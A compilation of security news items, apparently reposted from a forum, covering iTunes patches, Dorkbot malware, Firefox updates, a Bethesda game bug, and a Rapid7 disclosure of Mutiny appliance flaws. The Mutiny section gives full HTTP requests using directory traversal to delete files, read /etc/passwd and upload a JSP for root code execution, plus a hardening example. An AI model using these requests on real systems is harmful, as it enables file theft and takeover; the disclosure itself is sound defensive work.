  21. Apple has released iTunes 11.0.3 for OS X and Windows today. This update fixes a certificate validation issue for both Mac and Windows. If this vulnerability were exploited an attacker would be able to spoof an SSL certificate without a warning being presented, allowing the attacker to potentially execute arbitrary code.

They also fixed 40 other vulnerabilities in the Windows version of iTunes, which sounds really terrible (and might be), until you consider why. iTunes renders a lot of HTML and Mac users already have the WebKit-based browser, Safari, installed on their Macs. The Windows version of iTunes cannot rely on the Safari version of WebKit being present (thank God Apple doesn't require Safari to be installed), so Apple includes the needed libraries inside of the iTunes for Windows package.

What is unclear is why Apple has waited for so long to release these fixes for Windows users of iTunes. Let's take a look at the history of the oldest vulnerability fixed, CVE-2012-2824. CVE-2012-2824 is a "use after free" vulnerability in the SVG parsing code in WebKit. It has a CVSS severity score of 10, is considered easy to remotely exploit and could result in remote code execution (RCE). It was first reported on 27 April 2012 by miaubiz and was fixed in Google Chrome's implementation of WebKit on 26 June 2012, about 2 months from initially being reported. Apple's first attempt at fixing this flaw was in iOS 6.0.1 and Safari 6.0.2 on 1 November 2012, approximately six months after being reported. It is one of the vulnerabilities bundled into today's iTunes 11.0.3 update more than one year after disclosure.

Another vulnerability of note fixed in today's Windows version of iTunes is CVE-2012-5112, or as it is better known the Pinkie Pie vulnerability from Google's Pwnium 2 contest at the Hack in the Box 2012 conference. In combination with another flaw this bug won Pinkie Pie $60,000 USD and a Chromebook courtesy of Google.
While I do question the amount of time Apple needed to fix these bugs, that isn't the point of this post. The point is you should update iTunes now, especially if you are a Windows user who needs it to manage your music, movies, TV shows, iPad or iPod. The latest version of iTunes for Windows or OS X is always available at Apple - iTunes - Download iTunes Now. Sursa : Apple fixes 41 iTunes security flaws, some more than a year old | Naked Security
22. Back in March we published an exploit module for Mutiny Remote Code Execution. Mutiny "is a self-contained appliance for monitoring network-attached devices such as servers, switches, routers and printers. It has been designed to be simple to use, being aimed at the person who is more interested in the actual data gathered rather than the science of gathering the data." (Source: Mutiny User Guide). That module abused CVE-2012-3001, a command injection issue in the frontend application which allowed any authenticated user with access to the admin interface to execute OS commands with root privileges.

While developing that exploit, we took a look at the last version of the Mutiny FrontEnd available at that time (5.0-1.07) and found other issues, grouped under CVE-2013-0136, which have the plus of being exploitable from any authenticated role.

Vulnerabilities Summary

The Mutiny Appliance provides a Web Frontend, where the users can configure the system and monitor the data collected by the appliance. The Frontend provides four access roles: "Super Admin", "Administrator", "Engineer" and "View only". All the roles allow the user to access the "Documents" section, where multiple weaknesses have been detected allowing:

- To delete any file from the remote file system with root privileges.
- To copy and move files in the remote file system with root privileges, allowing also to download/retrieve these files.
- To upload arbitrary files to the remote file system and ultimately execute arbitrary code with root privileges.
Disclosure Timeline

Date         Description
2013-03-08   Initial discovery by Juan Vazquez, Metasploit Researcher
2013-03-09   Draft advisory and Metasploit module written
2013-03-11   Initial disclosure to the vendor, Mutiny Technology
2013-03-12   Follow-up with vendor
2013-03-27   Disclosure to CERT/CC
2013-05-14   Version 5.0-1.11 tested and not vulnerable to the disclosed exploitation (1)
2013-05-15   Public Disclosure
2013-05-15   Metasploit exploit module published

Prior to public disclosure the last version available was tested, and the disclosed exploit techniques don't work anymore. The tested version was "5.0-1.11 (EAGLe) - (02-05-13)". Since the vendor neither warned us about the patch nor asked us to review it, we can't assure that the current patch is 100% secure, nor do we have details about revisions between 5.0.1-07 and 5.0.1-11 which could be vulnerable. We encourage you to use the current Metasploit modules in order to test your Mutiny installation for the disclosed vulnerabilities.

Technical Analysis

The Web Frontend of Mutiny is provided in part by a Java Web Application. This frontend provides a "Documents" section for authenticated users of any role:

The Documents functions are in part provided by a servlet named "EditDocument". This servlet provides several "Documents" functions such as upload, copy, move and delete documents:

    protected void doPost(HttpServletRequest httpservletrequest, HttpServletResponse httpservletresponse)
        throws ServletException, IOException
    . . .
        s = httpservletrequest.getParameter("operation");
        if(ServletFileUpload.isMultipartContent(httpservletrequest))
            s = "UPLOAD";
    . . .
        if(!s.equals("NEW")) goto _L2; else goto _L1
    . . .
        if(!s.equals("RENAME")) goto _L5; else goto _L4
    . . .
        if(!s.equals("DELETE")) goto _L7; else goto _L6
    . . .
        if(!s.equals("CUT") && !s.equals("COPY")) goto _L9; else goto _L8

The UPLOAD operation can be abused via a Directory Traversal vulnerability in the "uploadPath" parameter to upload arbitrary files and contents to the remote filesystem with root privileges:

    if(s.equals("UPLOAD"))
    {
        ServletFileUpload servletfileupload = new ServletFileUpload(new DiskFileItemFactory());
        List list = null;
        try
        {
            list = servletfileupload.parseRequest(httpservletrequest);
        }
        catch(FileUploadException fileuploadexception)
        {
            fileuploadexception.printStackTrace();
        }
        String s6 = null;
        FileItem fileitem = null;
        Iterator iterator = list.iterator();
        do
        {
            if(!iterator.hasNext())
                break;
            FileItem fileitem1 = (FileItem)iterator.next();
            if(fileitem1.isFormField() && fileitem1.getFieldName().equals("uploadPath"))
                s6 = fileitem1.getString(); // User controlled
            else if(!fileitem1.isFormField() && fileitem1.getFieldName().equals("uploadFile"))
                fileitem = fileitem1; // User controlled
        } while(true);
        if(s6.length() == 0)
        {
            System.out.println("Error: uploadPath not set.");
            s6 = "/documents";
        }
        if(fileitem == null)
        {
            System.out.println("Error: uploadFile not set.");
        } else
        {
            File file5 = new File(DocumentUtils.root, s6); // Directory Traversal
            File file7 = new File(file5, fileitem.getName());
            file7.getParentFile().mkdirs();
            file7 = DocumentUtils.getUniqueFile(file7, false);
            file7.createNewFile();
            try
            {
                fileitem.write(file7); // Write file
                if(file7.exists() && file7.length() == fileitem.getSize())
                    flag = true;
                if(debug)
                    System.out.println((new StringBuilder()).append(s).append(": ").append(file7.getPath()).toString());
            }
            catch(Exception exception)
            {
                exception.printStackTrace();
            }
        }
    }

The DELETE operation is also affected by a directory traversal vulnerability in the "paths[]" parameter, which allows deleting arbitrary files with root privileges:

    _L5:
        if(!s.equals("DELETE")) goto _L7; else goto _L6
    _L6:
        String as1[] = httpservletrequest.getParameterValues("paths[]"); // User controlled
        String as2[] = as1;
        int j = as2.length;
        for(int k = 0; k < j; k++)
        {
            String s7 = as2[k];
            File file6 = new File(DocumentUtils.root, s7); // Directory Traversal
            if(!isValid(file6))
                return;
            if(file6.isDirectory())
                FileUtils.deleteDirectory(file6); // Delete directory
            else
                flag = file6.delete(); // Delete file
            if(debug)
                System.out.println((new StringBuilder()).append("DELETE: ").append(file6.getPath()).toString());
        }

The CUT and COPY operations are also affected by directory traversal vulnerabilities in the "paths[]" and "newPath" parameters, which allow copying and moving files around the remote file system with root privileges:

    if(!s.equals("CUT") && !s.equals("COPY")) goto _L9; else goto _L8
    _L8:
        File file2;
        String as3[];
        String s4 = httpservletrequest.getParameter("newPath");
        file2 = new File(DocumentUtils.root, s4); // Directory Traversal in newPath
        as3 = httpservletrequest.getParameterValues("paths[]");
        if(as3 == null) goto _L3; else goto _L10
    _L10:
        String as4[];
        int l;
        int i1;
        as4 = as3;
        l = as4.length;
        i1 = 0;
    _L11:
        File file8;
        File file9;
        FileInputStream fileinputstream;
        FileOutputStream fileoutputstream;
        if(i1 >= l)
            break; /* Loop/switch isn't completed */
        String s8 = as4[i1];
        file8 = new File(DocumentUtils.root, s8); // Directory traversal in paths[]
        if(!isValid(file8))
            return;
        file9 = new File(file2, file8.getName()); // Directory traversal in newPath
        file9 = DocumentUtils.getUniqueFile(file9, file8.isDirectory());
        if(debug)
            System.out.println((new StringBuilder()).append(s).append(": ").append(file9.getPath()).toString());
        file9.getParentFile().mkdirs();
        if(s.equals("CUT"))
        {
            flag = file8.renameTo(file9); // CUT operation affected by directory traversals
            break MISSING_BLOCK_LABEL_881;
        }
        if(!s.equals("COPY"))
            break MISSING_BLOCK_LABEL_881;
        if(!file9.exists())
            file9.createNewFile();
        fileinputstream = null;
        fileoutputstream = null;
        fileinputstream = new FileInputStream(file8); // COPY operation affected by directory traversals
        fileoutputstream = new FileOutputStream(file9);
        byte abyte0[] = new byte[4096];
        int j1;
        while((j1 = fileinputstream.read(abyte0)) > 0)
            fileoutputstream.write(abyte0, 0, j1);
        flag = true;
        fileinputstream.close();
        fileoutputstream.close();
        break MISSING_BLOCK_LABEL_881;
        Exception exception1;
        exception1;
        System.err.println(exception1.getMessage());
        fileinputstream.close();
        fileoutputstream.close();
        break MISSING_BLOCK_LABEL_881;
        Exception exception2;
        exception2;
        fileinputstream.close();
        fileoutputstream.close();
        throw exception2;
        i1++;
        if(true) goto _L11; else goto _L3

Exploitation

After examining the "doPost()" function from the "EditDocument" servlet, requests to abuse these functions have been built.

DELETE operation

The next request allows deleting an arbitrary file from the filesystem:

    POST /interface/EditDocument HTTP/1.1
    Host: 192.168.1.177
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17
    Content-Length: 76
    Accept: */*
    Origin: http://192.168.1.177
    X-Requested-With: XMLHttpRequest
    Content-Type: application/x-www-form-urlencoded
    Referer: http://192.168.1.177/interface/documents.jsp
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Cookie: JSESSIONID=611F495538F214B351A860D32273DB89; JSESSIONIDSSO=EF00467D61F67EA2CE86010762914E4D
    Connection: keep-alive
    Proxy-Connection: keep-alive

    operation=DELETE&paths%5B%5D=../../../../test.msf

In this case the "/test.msf" file will be deleted in the remote file system. The 4 level traversal is due to "DocumentUtils.root" by default pointing to "/var/MUTINY/upload/documents" in the Linux based appliance. The response to the request informs if the file deletion has been successful:

    HTTP/1.1 200 OK
    Server: Apache-Coyote/1.1
    X-UA-Compatible: IE=10
    Content-Type: application/json;charset=UTF-8
    Content-Length: 16
    Date: Fri, 08 Mar 2013 02:16:18 GMT

    {"success":true}

COPY operation

The copy operation allows copying arbitrary files in the remote file system with root privileges.
By copying arbitrary files to the default web root in the appliance it's possible to retrieve arbitrary files. The next request allows copying the "/etc/passwd" file to the web root for mobile devices, by default located at "/usr/jakarta/tomcat/webapps/ROOT/m" in the Mutiny Linux based appliance:

    POST /interface/EditDocument HTTP/1.1
    Host: 192.168.1.177
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17
    Content-Length: 111
    Accept: */*
    Origin: http://192.168.1.177
    X-Requested-With: XMLHttpRequest
    Content-Type: application/x-www-form-urlencoded
    Referer: http://192.168.1.177/interface/documents.jsp
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Cookie: JSESSIONID=14CE95F1ED56321B4B226DF669D691C0; JSESSIONIDSSO=FA98603965548C3FB1F67BC5121A75DC
    Connection: keep-alive
    Proxy-Connection: keep-alive

    operation=COPY&paths%5B%5D=../../../../etc/passwd%00.txt&newPath=../../../../usr/jakarta/tomcat/webapps/ROOT/m/

The response to the request informs if the file deletion has been successful:

    HTTP/1.1 200 OK
    Server: Apache-Coyote/1.1
    X-UA-Compatible: IE=10
    Content-Type: application/json;charset=UTF-8
    Content-Length: 16
    Date: Fri, 08 Mar 2013 04:11:17 GMT

    {"success":true}

By accessing *ttp://appliance/m/passwd it is possible to retrieve the remote file:

UPLOAD operation

The upload operation allows uploading an arbitrary file to the file system with root privileges. By uploading a JSP file to the "/usr/jakarta/tomcat/webapps/ROOT/m" default location, arbitrary Java can be executed with root privileges by later invoking the JSP file via the web interface. The next request allows uploading JSP code to the "/usr/jakarta/tomcat/webapps/ROOT/m/msf.jsp" location:

    POST /interface/EditDocument HTTP/1.1
    Host: 192.168.1.177
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17
    Content-Length: 491
    Accept: */*
    Origin: http://192.168.1.177
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPxNcR2XfK8d5gMeU
    Referer: http://192.168.1.177/interface/documents.jsp
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Cookie: JSESSIONID=611F495538F214B351A860D32273DB89; JSESSIONIDSSO=EF00467D61F67EA2CE86010762914E4D
    Connection: keep-alive
    Proxy-Connection: keep-alive

    ------WebKitFormBoundaryPxNcR2XfK8d5gMeU
    Content-Disposition: form-data; name="uploadFile"; filename="msf.jsp"
    Content-Type: application/octet-stream

    <html>
    <head><title>Metasploit Test Page</title></head>
    <body>
    <font size="10"><%="Metasploit Test" %></font>
    </body>
    </html>
    ------WebKitFormBoundaryPxNcR2XfK8d5gMeU
    Content-Disposition: form-data; name="uploadPath"

    ../../../../usr/jakarta/tomcat/webapps/ROOT/m
    ------WebKitFormBoundaryPxNcR2XfK8d5gMeU--

The response to the request informs if the file upload has been successful:

By accessing *ttp://appliance/m/msf.jsp it is possible to execute the uploaded JSP code:

Metasploit modules

In order to assist vulnerability testing, two modules for the Metasploit framework have been developed.

mutiny_frontend_read_delete

The "mutiny_frontend_read_delete" is an auxiliary module which abuses the DELETE and COPY operations to retrieve or delete arbitrary files from the remote system:

Reading /etc/passwd

Deleting remote files

mutiny_frontend_upload

The "mutiny_frontend_upload" is an exploit module which abuses the UPLOAD operation to upload arbitrary JSP code and an arbitrary payload embedded in an ELF file. The last one is executed through the invocation of the JSP stager:

Exploits: Mutiny Vulnerabilities by Juan Vazquez

Source: https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities
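An added example, not Mutiny's or Rapid7's code, of the containment check the EditDocument servlet lacks: it joins the advisory's own uploadPath / paths[] values to DocumentUtils.root the way `new File(DocumentUtils.root, s6)` does, shows where each one lands (including why the `%00.txt` suffix in the COPY request reaches /etc/passwd), and then applies a normalise-and-contain check that rejects them while accepting a path under the documents root. The class name, helper names and the legitimate sample path are assumptions; paths are POSIX as on the Linux appliance.

```java
import java.io.File;
import java.io.IOException;
import java.nio.file.Path;
import java.nio.file.Paths;

/*
 * Added example, not Mutiny's code. Contrasts the servlet's
 * "new File(DocumentUtils.root, userInput)" pattern with a containment check
 * a fixed EditDocument could apply to uploadPath, paths[] and newPath.
 * ROOT and the three attack inputs come from the advisory; helper names are ours.
 */
public class DocumentPathCheck {

    /** Default documents root on the appliance, as stated in the advisory. */
    static final String ROOT = "/var/MUTINY/upload/documents";

    /** The vulnerable pattern: user input is joined to the root and used as-is. */
    static String unsafeResolve(String root, String userPath) {
        return new File(root, userPath).getPath();
    }

    /**
     * What the filesystem actually opens for the unsafe path: ".." segments
     * collapse, and the JVMs of the time passed the name through to the native
     * layer, which stops at the first NUL. That is why
     * "../../../../etc/passwd%00.txt" ends up reading /etc/passwd.
     */
    static String effectivePath(String unsafePath) {
        int nul = unsafePath.indexOf('\0');
        String truncated = nul >= 0 ? unsafePath.substring(0, nul) : unsafePath;
        return Paths.get(truncated).normalize().toString();
    }

    /**
     * Hardened resolution: refuse empty input and NUL bytes, normalise lexically,
     * and require the result to stay under the documents root. Lexical checks do
     * not follow symlinks; if links may exist under ROOT, add a toRealPath() check
     * on the parent directory before creating or deleting anything.
     */
    static Path safeResolve(String root, String userPath) throws IOException {
        if (userPath == null || userPath.isEmpty() || userPath.indexOf('\0') >= 0) {
            throw new IOException("rejected: empty path or NUL byte");
        }
        Path base = Paths.get(root).toAbsolutePath().normalize();
        Path target = base.resolve(userPath).normalize();  // absolute input replaces base
        if (!target.startsWith(base)) {                    // component-wise, not prefix
            throw new IOException("rejected: escapes documents root");
        }
        return target;
    }

    public static void main(String[] args) {
        // Inputs taken from the advisory's three requests, plus one constructed legitimate path.
        String[] inputs = {
            "../../../../test.msf",                            // DELETE  paths[]
            "../../../../etc/passwd\0.txt",                    // COPY    paths[]
            "../../../../usr/jakarta/tomcat/webapps/ROOT/m",   // UPLOAD  uploadPath
            "reports/march.pdf"                                // normal use (constructed)
        };
        for (String in : inputs) {
            String unsafe = unsafeResolve(ROOT, in);
            System.out.println("input:    " + in.replace("\0", "%00"));
            System.out.println("unsafe -> " + effectivePath(unsafe));
            try {
                System.out.println("safe   -> " + safeResolve(ROOT, in));
            } catch (IOException e) {
                System.out.println("safe   -> " + e.getMessage());
            }
            System.out.println();
        }
    }
}
```

Note that the UPLOAD branch also passes the multipart filename into `new File(file5, fileitem.getName())` unchecked, so the same check belongs on the filename as well as on uploadPath.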
23. How the Dorkbot virus that spreads through Facebook chat works

The Dorkbot virus uses IRC (Internet Relay Chat) networks to send and receive data, and was detected by Bitdefender in an initial version two years ago, as Backdoor.IRCBot.Dorkbot. The new variant of the virus, which appeared in the last week, spreads as links in messages on Facebook chat and can update itself to install its newest version.

The virus has now been packed in a new form, with the aim of evading antivirus solutions. The malicious software thus has rootkit capabilities, and can even prevent the antivirus from performing security updates. Dorkbot can also spy on users' activity in the browser. Besides instant messaging, the virus can also spread through USB devices.

Users should not click on messages which, although they look like photos, are executable files. When downloaded, they install, without the users' consent, malicious software that gives attackers control over the infected computer. In general, running such a file (with the '.exe' extension) is dangerous regardless of whether it is received from friends or from unknown people through instant messaging programs (Facebook, Yahoo Messenger etc.).

In the last two years, Bitdefender has observed an increase in the number of viruses propagated through social networks, most often through Facebook scams. In Romania, the most popular are of the "see who viewed your profile" type. Among the top dangerous sites spread on Facebook are also fraudulent links, which try to convince users to take part in surveys to win prizes, usually mobile phones or tablets.

Phishing, through which users' personal data is stolen, is no longer as popular as in the early years of social networks, because users have learned to recognise such messages.

Users are advised to keep their antivirus solution up to date, as well as their operating system and the applications they use. They can also install the free Safego solution, which scans links on Facebook and protects them from the newest cyber threats, such as spam, phishing and malware, as well as from over-exposure of personal data.

Source: Smartnews - Cum actioneaza virusul Dorkbot ce se raspandeste prin chat-ul Facebook
24. Not to be outdone by Microsoft's and Adobe's Patch Tuesday releases, Mozilla pushed out its latest browser and email client updates today.

The Firefox browser goes to 21.0, on Android as well as on desktops. (You don't install browsers on your servers, do you?)

The Thunderbird email client is only available in an Extended Support Release these days, meaning it gets regular security patches but infrequent product enhancements; it hits 17.0.6.

Microsoft's May 2013 Internet Explorer updates included two patches for which the world was waiting with bated breath - one to fix a vulnerability exposed at the 2013 PWN2OWN competition, and a second to close a much-publicised zero-day briefly found on a US government website at the end of April.

Mozilla, on the other hand, fixed its own PWN2OWN-found flaws within 24 hours, so its last two updates, 20.0 and 21.0, have been largely proactive on the security front.

This time round, there are 681 listed bug fixes, with eight separately-documented security advisories. Three of those close multiple holes that Mozilla admits "are potentially exploitable, allowing for remote code execution."

"Memory corruption problems, where software incorrectly writes over its own or another program's code or data structures, are not always exploitable for malicious purposes. But they are always wrong, and often dangerous, especially in browsers and email clients, which spend most of their time processing content from untrusted external sources."

Mozilla, very creditably, tends not to mince its words when dealing with bugs of this sort. For example, in Mozilla Foundation Security Advisory 2013-41, no exploits were immediately obvious for any of the bugs fixed, leading the team to report nothing worse than "we presume that with enough effort at least some of these could be exploited to run arbitrary code." Nevertheless, this advisory was rated Critical.

Many users will have Firefox set to grab and deploy updates automatically; if you're one of those who don't, it's Make Your Mind Up Time!

If it helps you to decide, I just published this story in Firefox 21.0 on OS X, immediately after updating. That's a very minor and entirely unrepresentative "test", but I'm pleased to say my plugins (including the Firebug debugger) have all behaved themselves, and I haven't had any problems.

Source: Mozilla pushes out new Firefox and Thunderbird: 8 security advisories, 3 critical fixes | Naked Security
25. Skyrim

A SECURITY RESEARCHER has posted details of a hacking exploit that can get you into games including Skyrim and Fallout 3.

Researcher Joe Giron describes himself on his blog by saying, "I'm 25, I'm a Linux admin, and I like to break things. Software mostly."

There isn't much to exploit in terms of security here, but what we do have is a longstanding vulnerability that affects a swathe of games.

"I found a format string vulnerability in Morrowind, Oblivion, Fallout 3, Fallout New Vegas, and the latest game Skyrim," he wrote. "And it's also not just The Elder Scrolls games that are affected. Since Bethesda produced The Elder Scrolls games, it's worth mentioning that other games produced by this company are vulnerable to this same attack. I'm of course talking about Fallout 3 and its counterpart, Fallout New Vegas."

The scripting vulnerability dates back to at least 2001, which is when Morrowind was released. We have asked Bethesda to comment, but so far it has stayed mute.

Giron has posted up proof of the exploit in action, showing how a simple command key can kick off crashes in a range of Bethesda games.

"I'm certain the same vulnerability lies in Fallout 3 and Oblivion, however I was too lazy to install to show you all, but you get the idea. Same vulnerable scripting module," he added.

"So far, the only feasible way to exploit the game I've come up with is by some sort of hand crafted mod or plugin for the game, as that would have access to the scripting console on which the vulnerabilities lie. That said, it would be difficult to exploit in the wild, also due in part to the video games having no network capability."

Source: http://www.gironsec.com/blog/2013/05/exploit-in-skyrim/
http://www.theinquirer.net/inquirer/news/2267690/hacking-exploit-pops-up-for-bethesda-s-skyrim-and-fallout